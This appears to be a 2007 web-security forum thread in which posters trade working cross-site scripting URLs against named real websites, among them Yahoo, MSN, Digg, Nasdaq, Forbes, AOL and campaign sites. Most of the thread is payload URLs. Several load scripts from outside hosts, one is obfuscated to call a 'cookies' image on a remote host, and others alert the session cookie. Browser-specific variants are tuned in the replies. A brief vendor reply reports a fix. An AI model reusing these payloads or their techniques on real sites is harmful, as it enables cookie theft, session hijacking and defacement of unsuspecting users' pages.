Even easier.
http://www.leapfish.com/domain_name_appraisal.php?url=1337%3Cscript%20src=//ha.ckers.org/s%20/%3E

- Kyran

Kyran, that's Firefox only (and then not even Firefox 3.0 alphas). I gave the other variant because it will work in all browsers.



Edited 1 time(s). Last edit at 04/17/2007 09:31AM by trev.

Actually, it works fine in Opera.
And with only a slight edit, it works in IE.
http://www.leapfish.com/domain_name_appraisal.php?url=1337%3Cscript%20defer%20src=//ha.ckers.org/s%20/%3E%3C/script%3E

- Kyran

Self-made XSS on Yahoo (have to click the ad):

[eur.a1.yimg.com]

Originally this was clickTAG=javascript:bfss_doGetURL(...) - that's what they have on Yahoo's main page. Unbelievable...



Edited 4 time(s). Last edit at 04/23/2007 07:14PM by trev.

302 - Firefox only

http://search.news.com/click?sl,news.56.282.1557.0.1.%2522%26gt%3B%26lt%3Bmoo.0,javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

you have typo should be http://search.news.com/click?sl,news.56.282.1557.0.1.%2522%26gt%3B%26lt%3Bmoo.0,javascript:alert('xss')%22

NSFW:
http://www.bankrate.com/brm/searchResults.asp?q=<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,97,119,101,115,111,109,101,97,110,100,114,101,119,46,110,101,116,47,105,109,97,103,101,115,47,99,111,111,107,105,101,115,46,103,105,102,34,62));</script>&btnG=submit&site=my_collection&client=my_collection&output=xml_no_dtd&getfields=*&web=brm&advSearch=0&sort=date%3AD%3AS%3Ad1

NSFW:
http://www.royaltyfreehd.com/catalog/search.jsp?search=<script%20defer%20src="http://www.awesomeandrew.net/fd/stock.js"></script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://apidoc.digg.com/FindPage?SearchFor=Digg%22style%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29;

Ghozt Wrote:
-------------------------------------------------------
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22s
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
> 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
Couldn't make it work on Firefox (where it belongs), not sure why, but this variant did work with IE:

http://apidoc.digg.com/FindPage?SearchFor=Digg%22%20style%3D%22color:%20expression%28document.title%3D%27xss%27%29

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

ma1 Wrote:
-------------------------------------------------------
> Ghozt Wrote:
> --------------------------------------------------
> -----
> >
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22s
>
> >
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
>
> > 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
> Couldn't make it work on Firefox (where it
> belongs), not sure why, but this variant did work
> with IE:
>
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22%
> 20style%3D%22color:%20expression%28document.title%
> 3D%27xss%27%29

Not sure what you were trying to do, but this works in IE, FF and Opera:

http://apidoc.digg.com/FindPage?SearchFor=Digg%22%3e%3cscript%3ealert(1)%3c/script%3e%3cinput

Added a dead input tag to hide the maxlength attribute on the search box that gets orphaned on the injection.

> Not sure what you were trying to do, but this
> works in IE, FF and Opera:
>
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22%
> 3e%3cscript%3ealert(1)%3c/script%3e%3cinput
>
> Added a dead input tag to hide the maxlength
> attribute on the search box that gets orphaned on
> the injection.

Looks like apidoc.digg.com is using a WikiLike software from www.pbwiki.com

I'll quote something from their site (http://pbwiki.com/biz.html)
"Most IP theft and security issues happen behind the firewall, where security tends to be lax. We're fanatical about security. "

http://mrlindsay.pbwiki.com/FindPage?SearchFor=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

I've just done what I think its right, and sent them a mail with a link to this thread.

PD: A couple of msn.com XSS

http://photo.be.msn.com/cart/indexnoxml.asp?Mnemonic=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://soittoaanet.fi.msn.com/polytones_intro_prod_categoria.asp?idcateg=980&categ=Iskelm%C3%A4%20%22%3E%3Cscript%20%3Ealert(document.cookie)%3C/script%3E%22
http://photo.be.msn.com/inc/transfertodotnet.asp?moduleto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cwt+x=%22

[k] Wrote:

> Not sure what you were trying to do
Ghozt tried to include an external script using XBL (Gecko based browsers), I "tried" to run a MS-proprietary CSS JS expression, which was the morphologically most similar translation for IE, i.e. script execution from a CSS inline attribute.
If you didn't notice, it changes the document title but should do as well anything else, I just didn't want to lock your browser with infinite alerts and was too lazy to include a run-once flag check.

It was just for fun, your vector is the most universal and obvious - obviously ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 04/22/2007 06:00AM by ma1.

Ah right, gotcha. Interesting in some scenarious, could be useful. I like the idea of browser-specific exploits, I just haven't found a direct use for one. I can think of some scenarios, but only in a highly-focussed attack.

http://search3.webfeat.org/cgi-bin/WebFeat.dll?Command=Search&noserial=1&format=JS&rtmpl=js&wf_term1=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&wf_field1=wf_keyword&Databases=wf_ebschool%2Cwf_sirsks%2Cwf_sirsdiscover%2Cwf_groveart%2Cwf_kidsinfobits%2Cwf_ebscoxml_mih%2Cwf_ebscoxml_ulh%2Cwf_ebscoxml_f5h%2Cwf_ebscoxml_nfh&wf_all_years=yes

Found this while doing a research paper for lit. W.H. Auden is a punk bitch. I hate poems. :(

"Pessimistic analogy revolving around life."

Thanks for pointing these XSS issues out. We're going to fix those pronto. If you find other security issues, we'd love to hear from you directly. You can email me (David Weekly, the CEO of PBwiki) at david@pbwiki.com to make sure it's brought immediately to my attention.

Thanks for helping us build a more secure product!

-David

The FindPage XSS issue pointed out here is now fixed in production. Please let me know if you find others. :)

rsnake Wrote:
-------------------------------------------------------
> http://www.nasdaq.com/portfolio/ptform2.asp?site=&
> sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%
> 22)%3C/script%3E&name=&submit=Submit
Found this one when I saw how bad a certain stock was sucking last night.
http://quotes.nasdaq.com/quote.dll?page=charting&mode=basics&intraday=off&timeframe=1y&charttype=line&splits=off&earnings=off&movingaverage=None&lowerstudy=volume&comparison=off&index=&drilldown=off&symbol="><script>alert(1);</script>&selected=ASS


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.edirectsoftware.com/search_result.php?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Search.x=0&Search.y=0

http://www.min-edu.pt/np3/pesquisa?txt=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0

-------------------------------
http://fr3dc3rv.blogspot.com

http://fr.rpmfind.net/linux/rpm2html/search.php?query=%22%3e%3Cscript%3Ealert(1)%3C/script%3E

Didn't bother cleaning up. This one triggers twice;one when breaking out of the input and again when it is echoed to the page. It is also written to the title tag.

There are three inputs on the page, all of which have the same vulnerability.

http://www.mininova.org/search/?search=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.torrentspy.com/search?query=%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E&submit.x=0&submit.y=0
http://thepiratebay.org/brwsearch.php?orderby=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.onlytorrents.com/search/?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

torrents!

There are various vulns on forbes...
http://search.forbes.com/search/find?MT=%22%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2Fh4k.in%2Fj.js%3E

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

with search history enabled: http://search.aol.com/aol/search?query=%22%3E%3Cscript%3Ealert%28455%29%3C%2Fscript%3E&safesearch=0&invocationType=adultNC
after following link, perform any other search with the search history still turned on and vector will fire



Edited 1 time(s). Last edit at 04/27/2007 12:17AM by thornmaker.

http://www.wweshop.com/quickshop.asp?notfound=%3Cscript%3Ealert(document.cookie)%3C/script%3E

It will echo anything you put. No filtering what so ever.

http://www.joebiden.com/getinformed/opeds?id=%3Cscript%3Ealert(/xss/)%3C/script%3E
https://contribute.hillaryclinton.com/form.html?sc=7%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://my.barackobama.com/page/event/search_results?type=simple&orderby=zip_radius&zip_radius%5b0%5d=90210&zip_radius%5b1%5d=100%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

http://www.virginmedia.com/results/?q=%22%3e%3cscript%3ealert(1)%3c/script%3e
http://search.orange.co.uk/all?q=%22%3c/title%3e%3E%3cscript%3ealert(1)%3c/script%3etest
http://www.marksandspencer.com/gp/search/202-6542564-3636619?field-keywords=%5c%22;alert(1);//

From an anonymous lurker:

https://www.cenzic.com/forms/ec.php?pubid=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

http://www.qualys.com/forms/trials/freescan/matrix/?first=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit&lsid=6960&_form_visited=1

- RSnake
Gotta love it. http://ha.ckers.org

Theres a lot more than this, but yeah:

http://www.dnscoop.com/tools/dns/domainwhois.php?query=%3Cplaintext%3E
http://www.dnscoop.com/index.php=%22%3E%3Cscript%3Ealert(1)%3C/script%3E



Edited 1 time(s). Last edit at 05/01/2007 04:36PM by Secks.

In the light of the recent digg riot against censoring the HD-DVD key, it would be funny to find some XSS on hddvd homepage and insert the number on their own page :P

I didn't managed to find one. Maybe others are more lucky.
http://www.hddvdprg.com/

That should be difficult. Google find only one dynamic web page there: http://www.hddvdprg.com/cgi/jpn_enq/enq.cgi. And they don't even use JavaScript.